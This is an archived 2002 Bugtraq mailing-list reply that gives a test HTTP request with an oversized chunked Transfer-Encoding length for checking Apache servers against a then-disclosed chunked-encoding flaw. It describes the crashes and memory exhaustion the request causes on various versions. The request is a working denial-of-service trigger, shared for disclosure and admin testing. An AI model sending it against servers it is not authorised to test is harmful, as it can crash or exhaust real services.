Bugtraq mailing list archives

Re: ISS Advisory: Remote Compromise Vulnerability in Apache HTTP Server

From: Joe Testa <jtesta () rapid7 com>
Date: Wed, 19 Jun 2002 08:26:31 -0400

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Greetings sweaty Apache admins,


   Now that the Apache group has released official fixes, here is a
test string that can be used to check if your server is vulnerable:


POST /x.html HTTP/1.1
Host: 192.168.x.x
Transfer-Encoding: chunked

80000000
Rapid 7
0


Here is the behavior that the above string will produce:

UNIX:

   Apache 1.3.24:
       Connection is instantly dropped.
       The connection is not logged in the access_log, but the following
           will appear in the error_log:

       [Mon Jun 17 16:12:25 2002] [notice] child pid 21452 exit signal
       Segmentation fault (11)

   Apache 2.0.36:
       No effect!  Hmmm...

Win32:

   Apache 1.3.24:
       Connection is instantly dropped.
       The connection is *not* logged in access_log nor error_log!

   Apache 2.0.36:
       Connection appears to hang while child thread consumes all
           available memory.  After a minute or two, the OS reports that
           virtual memory is exhausted via a server-side dialog box.
           A remote client cannot determine the result of this test
           because the connection remains open until the dialog box is
           dismissed.  A non-vulnerable server will not drop the
           connection because it is waiting to receive 2 gigabytes of
           legitimately chunked data.
       The connection is not logged in access_log, but the following will
           appear in the error_log:

       [Tue Jun 18 09:16:34 2002] [notice] Parent: child process exited
       with status 3221225477 -- Restarting.


- ---

   Note that in the test string above, you can interchange the "POST"
with "GET", and you can use any hex value between 80000000 and
FFFFFFFF for the chunk size.
   Comments are much appreciated.


   - Joe Testa


GPG key:  http://www.cs.rit.edu/~jst3290/joetesta_r7.pub
A22B 2683 C40E 5443 AE52  AD6D 65B2 F5DF 4B11 06B4

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE9EHgzZbL130sRBrQRArCAAJ9GcN9tJPTdo1KFbmGc59sCASAhOwCfX5nn
hWWOxf/ygikJrpuamlJ6/Js=
=sTVg
-----END PGP SIGNATURE-----

Current thread:

ISS Advisory: Remote Compromise Vulnerability in Apache HTTP Server X-Force (Jun 17)
- Re: ISS Advisory: Remote Compromise Vulnerability in Apache HTTP Server valcu.gheorghe (Jun 17)
  - Message not available
    - Re: ISS Advisory: Remote Compromise Vulnerability in Apache HTTP Server Florian Weimer (Jun 17)
  - Re[2]: ISS Advisory: Remote Compromise Vulnerability in Apache HTTP Server bogachev igor (Jun 17)
  - Re: ISS Advisory: Remote Compromise Vulnerability in Apache HTTP Server Dave Aitel (Jun 19)
- Re: ISS Advisory: Remote Compromise Vulnerability in Apache HTTP Server Joe Testa (Jun 19)